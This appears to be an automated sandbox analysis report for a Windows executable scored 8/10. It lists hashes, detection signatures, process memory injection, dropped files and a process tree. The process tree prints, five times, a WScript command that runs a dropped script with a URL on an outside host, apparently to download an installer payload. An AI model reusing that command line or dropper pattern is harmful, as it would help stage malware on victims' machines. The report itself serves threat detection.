df0bf5837e50eb2143a8bc5e787c5c3a088475e35effaf38f6e9d86d3a1eadec

Analysis

max time kernel
69s
max time network
115s
platform
windows7_x64
resource
win7-20230705-en
resource tags

arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system
submitted
08/07/2023, 11:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

761b655be86bfaexeexeexeex.exe
Size

184KB
MD5

761b655be86bfab4d7aee2b3413890c9
SHA1

fcc2ff8ddc8decf628396cd91e4000cb0d20a1e4
SHA256

df0bf5837e50eb2143a8bc5e787c5c3a088475e35effaf38f6e9d86d3a1eadec
SHA512

84c884281bbce18e82438d58deeabe52a947ec9c82eb1e9202530eab54ccada9a4e972eef1422467a42859a3a41ddba57c252b5cc32aa69b973ce06ff340ce82
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3z:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
5	3068	WScript.exe
7	3068	WScript.exe
9	3068	WScript.exe
12	1000	WScript.exe
13	1000	WScript.exe
15	1444	WScript.exe
16	1444	WScript.exe
23	2716	WScript.exe
24	2716	WScript.exe
26	760	WScript.exe
27	760	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
920	2348	WerFault.exe	6

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 3068	2348	761b655be86bfaexeexeexeex.exe	27
PID 2348 wrote to memory of 3068	2348	761b655be86bfaexeexeexeex.exe	27
PID 2348 wrote to memory of 3068	2348	761b655be86bfaexeexeexeex.exe	27
PID 2348 wrote to memory of 3068	2348	761b655be86bfaexeexeexeex.exe	27
PID 2348 wrote to memory of 1000	2348	761b655be86bfaexeexeexeex.exe	29
PID 2348 wrote to memory of 1000	2348	761b655be86bfaexeexeexeex.exe	29
PID 2348 wrote to memory of 1000	2348	761b655be86bfaexeexeexeex.exe	29
PID 2348 wrote to memory of 1000	2348	761b655be86bfaexeexeexeex.exe	29
PID 2348 wrote to memory of 1444	2348	761b655be86bfaexeexeexeex.exe	31
PID 2348 wrote to memory of 1444	2348	761b655be86bfaexeexeexeex.exe	31
PID 2348 wrote to memory of 1444	2348	761b655be86bfaexeexeexeex.exe	31
PID 2348 wrote to memory of 1444	2348	761b655be86bfaexeexeexeex.exe	31
PID 2348 wrote to memory of 2716	2348	761b655be86bfaexeexeexeex.exe	33
PID 2348 wrote to memory of 2716	2348	761b655be86bfaexeexeexeex.exe	33
PID 2348 wrote to memory of 2716	2348	761b655be86bfaexeexeexeex.exe	33
PID 2348 wrote to memory of 2716	2348	761b655be86bfaexeexeexeex.exe	33
PID 2348 wrote to memory of 760	2348	761b655be86bfaexeexeexeex.exe	35
PID 2348 wrote to memory of 760	2348	761b655be86bfaexeexeexeex.exe	35
PID 2348 wrote to memory of 760	2348	761b655be86bfaexeexeexeex.exe	35
PID 2348 wrote to memory of 760	2348	761b655be86bfaexeexeexeex.exe	35
PID 2348 wrote to memory of 920	2348	761b655be86bfaexeexeexeex.exe	37
PID 2348 wrote to memory of 920	2348	761b655be86bfaexeexeexeex.exe	37
PID 2348 wrote to memory of 920	2348	761b655be86bfaexeexeexeex.exe	37
PID 2348 wrote to memory of 920	2348	761b655be86bfaexeexeexeex.exe	37

C:\Users\Admin\AppData\Local\Temp\761b655be86bfaexeexeexeex.exe
"C:\Users\Admin\AppData\Local\Temp\761b655be86bfaexeexeexeex.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7791.js" http://www.djapp.info/?domain=AwXwjvpPCo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf7791.exe
  2⤵
  - Blocklisted process makes network request
  PID:3068
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7791.js" http://www.djapp.info/?domain=AwXwjvpPCo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf7791.exe
  2⤵
  - Blocklisted process makes network request
  PID:1000
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7791.js" http://www.djapp.info/?domain=AwXwjvpPCo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf7791.exe
  2⤵
  - Blocklisted process makes network request
  PID:1444
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7791.js" http://www.djapp.info/?domain=AwXwjvpPCo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf7791.exe
  2⤵
  - Blocklisted process makes network request
  PID:2716
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7791.js" http://www.djapp.info/?domain=AwXwjvpPCo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf7791.exe
  2⤵
  - Blocklisted process makes network request
  PID:760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 472
  2⤵
  - Program crash
  PID:920

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
c4d5c775234f8d20396ce2b2ad124ee9

SHA1
1e08e0b9b1d5ab24e8e82564324b0f0d3915aade

SHA256
e243eab435bd4ba067f111d98739a582ec15a4b3293e8bdff7804770b957f852

SHA512
8dfbf96325e9709673dcdbc04e22c512e0caa574942487a9ae8382e05baf805d7515a4c1f8d9f2765597ecd90a0a697746b84ebbdbcbaebdb3b3813653f27ee6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
b58a92be81132f34c05105a82857df50

SHA1
1da99b670ca4fa7e0bba80c52333100c859f8f27

SHA256
b6bc33df2fec957c7d23b79b8855f1ec6ea81f4f1c217dd4bc617347493f5bb2

SHA512
4b636aebfba4895e97754241937b6bc7054d5e299bf127db9ca63f3865384c6f37ecc52e0e86e1f055c286037d4e277136325d82ce60c4e61e265e8e267c7551

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3aaad6e969235a2893b6db0ab6d27f67

SHA1
fd0b651894ea559774bdfcc28d2a3d4867b0db1c

SHA256
370d532e2126b34222a24146b699fac921947ccbd35476f4cdb659879ccc2911

SHA512
4326bfb374f9d991cbbcf2f7a502fe371d083e9893fad0d77d98d04fea57f9b58dda4572dea1b695bcb76e3071d97d124a4d8536c294ffbeaf7be997271145b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5I9HDCK2\domain_profile[1].htm

Filesize
40KB

MD5
5c91a3634b9e07735d392ccf27567b0e

SHA1
c5fb48b1a396d8fdce6d682eb7a25cbca8b5daa8

SHA256
9797d0e94f86929435b4d58b6e3eab23404772bf849a132157b553ba553f2e8f

SHA512
eb8aea808df37c765464d692ebae1ec4020e9a7c0e421d7dfa47188f3c7f8f11642702a58f8d2a8ae926072eb4e348f670a6cd18690eaceb0e5ad41c65ea4c42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5I9HDCK2\domain_profile[1].htm

Filesize
40KB

MD5
cb3974d49cd44180d17133ea3ccb4f80

SHA1
be63fadcf2ae7eb3e877a4a1c618f512fb561d69

SHA256
8409ed7ad6130c6f62c5a28bf526f7fc844ed87554317d25e4eafde25d4d25a2

SHA512
8b80036e0cb5a2b57234c111075f9df5dcd8ba49cb79700cc347d66652d5a830481bb925681d63742b9475f808c7a9c683b71c5abdb4b1b9904fea186da6291d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ANFZKI5S\domain_profile[1].htm

Filesize
40KB

MD5
7c067195ade8b6024c8c145f6f90c93d

SHA1
da7305b1d7795f3a0dce09818fab93c9d6a7613a

SHA256
eae2d04dcb0f555f9faaf0e0875df0039baa8a9678747db995cbf49d8edde7ba

SHA512
ad14995558b4f446de4c102110ed705378bc397c27a7f3b6cb9831587574407b964aeaf65ef9bbdef284b5a015a00f29438be53daff195114e72ad3c872dbb66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ANFZKI5S\domain_profile[1].htm

Filesize
40KB

MD5
80fd49dedd641557961db6d67121528a

SHA1
d076f4d4988df283a7f31c98046ec07c2dd45719

SHA256
10002529e28e8bd16c75550f3be5b1faf0bb03a42da128b4c2ed2cc8d95e41d8

SHA512
62f040415baf25b9925fd78cdb4ed7b991fb80782e3070ff7a35dc288d3c2da79b2d05dab4e01321d4e26cc85e031634e97f745164ee4f4a84c4ebae36443166

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ANFZKI5S\domain_profile[1].htm

Filesize
40KB

MD5
6aeefaab1757b4af44ab8593fd458e8c

SHA1
15139bf23f92364ec6c0fe360407baa1705d7ca5

SHA256
c005f350fe4f98c4599d28fece4fc395045450bf0340234b1b8ef6a4e98d9bf1

SHA512
42b61deb13fcbc4f238f23110cfc0d9d7dee9c90df3e7e9c308d3841124ad6239b5738e65c52a769e69c0a7cbe1f2d5196edf80189cb4928552e2330abea1035

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE3CB.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEA3.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf7791.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\LH1FRFCN.txt

Filesize
175B

MD5
ab25e473ec002b44dbfa1382e9762ed5

SHA1
9d52c4e8b1488ab376f2c15bdca0c6b47b595342

SHA256
7dc1cbe522521981ab64666303131875dccffedce052dd6a6676869ac36db855

SHA512
e6a3d3c3f9cb247931cd36d7ce8e0c9de7bcf77e4607133e0020ad5b681837542533b56da58790843eb8cb4e3b69b71cdc2d7b951c20ec97da665828ec0ca666

Download Submit